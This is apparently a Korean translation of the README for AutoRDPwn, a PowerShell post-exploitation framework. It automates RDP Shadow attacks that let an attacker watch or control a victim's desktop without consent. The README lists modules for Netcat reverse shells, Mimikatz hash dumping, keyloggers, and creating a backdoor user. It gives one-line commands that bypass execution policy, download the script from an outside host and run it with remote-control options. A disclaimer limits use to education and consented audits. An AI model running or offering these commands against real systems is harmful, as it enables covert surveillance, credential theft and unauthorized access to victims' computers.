
그림자 공격 프레임워크

AutoRDPwn은 Powershell로 작성된 사후 침투 프레임워크로, 주로 Microsoft Windows 컴퓨터에 대한 Shadow 공격을 자동화하기 위해 설계되었습니다. 이 취약점(Microsoft에서 기능으로 분류)은 원격 공격자가 피해자의 동의 없이 데스크톱을 볼 수 있게 하며, 필요에 따라 제어할 수도 있습니다. 이는 운영 체제 자체의 네이티브 도구를 사용합니다.
추가 모듈 덕분에 Netcat을 통한 원격 셸 획득, Mimikatz를 사용한 시스템 해시 덤프, 원격 키로거 로드 등이 가능합니다. 이 모든 것은 7개 언어로 완전히 직관적인 메뉴를 통해 이루어집니다.
또한, 사용법 섹션에 설명된 일련의 매개변수를 통해 리버스 셸에서 사용할 수 있습니다.
Powershell 4.0 이상
• 많은 버그 수정
• 미적 개선 및 대기 시간 개선
• 시스템 설정을 통한 프록시 인식 연결
• 이제 .zip 파일을 다운로드하여 오프라인 도구 사용 가능
• Enter 키를 눌러 언어 자동 감지
• Invoke-DCOM이 SharpRDP로 대체됨
• PowerUp이 Invoke-PrivescCheck로 대체됨
• 피해자 측 자동 정리 서브루틴 생성
• 새로운 모듈 사용 가능: AES로 암호화된 SMB Shell
• 새로운 모듈 사용 가능: RunAs로 사용자 변경
*나머지 변경 사항은 CHANGELOG 파일에서 확인할 수 있습니다.
이 애플리케이션은 로컬, 원격 또는 팀 간 피벗에 사용할 수 있습니다.
리버스 셸에서 원격으로 사용할 때는 다음 매개변수를 사용해야 합니다:
| 매개변수 | 설명 |
|---|---|
| -admin / -noadmin | 보유한 권한에 따라 하나를 사용합니다 |
| -nogui | 메뉴 및 일부 색상 로드를 방지하며, 기능은 보장됩니다 |
| -lang | 언어 선택 (English, Spanish, French, German, Italian, Russian 또는 Portuguese) |
| -option | 메뉴와 마찬가지로 공격 실행 방식을 선택할 수 있습니다 |
| -shadow | 원격 장치를 볼지 제어할지 결정합니다 |
| -createuser | 이 매개변수는 선택 사항이며, 피해자 컴퓨터에 AutoRDPwn:AutoRDPwn 사용자가 생성됩니다 |
| -noclean | 피해자 컴퓨터에서 모든 변경 사항을 되돌리는 프로세스를 비활성화합니다 |
한 줄 로컬 실행:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
한 줄 원격 실행 예시:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
https://darkbyte.net/autordpwn-la-guia-definitiva

이 프로젝트는 GNU 3.0 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하십시오.
이 프레임워크는 Joel Gámez Molina // @JoelGMSec에 의해 처음부터 생성되고 설계되었습니다.
일부 모듈은 타사 코드, 스크립트 및 도구를 사용하며, 특히 다음과 같습니다:
• Chachi-Enumerator by Luis Vacas --> https://github.com/Hackplayers/PsCabesha-tools
• Invoke-Phant0m by Halil Dalabasmaz --> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp by Nikhil "SamratAshok" Mittal --> https://github.com/samratashok/nishang
• Invoke-TheHash by Kevin Robertson --> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz by Benjamin Delpy --> https://github.com/gentilkiwi/mimikatz
• PsExec by Mark Russinovich --> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper by Stas'M Corp. --> https://github.com/stascorp/rdpwrap
• SharpRDP by Steven F --> https://github.com/0xthirteen/SharpRDP
그 외에도 여기에 다 담지 못한 많은 분들이 있습니다.. 모든 분들과 그들의 훌륭한 작업에 감사드립니다.
이 소프트웨어는 어떠한 종류의 보증도 제공하지 않습니다. 사용은 교육 환경 및/또는 고객의 동의를 받은 보안 감사에만 독점적으로 사용됩니다. 저는 오용이나 이로 인해 발생할 수 있는 손해에 대해 책임을 지지 않습니다.
자세한 내용은 Twitter @JoelGMSec와 제 블로그 darkbyte.net에서 저를 찾을 수 있습니다.
제 작업을 지원하려면 커피 한 잔 사주세요: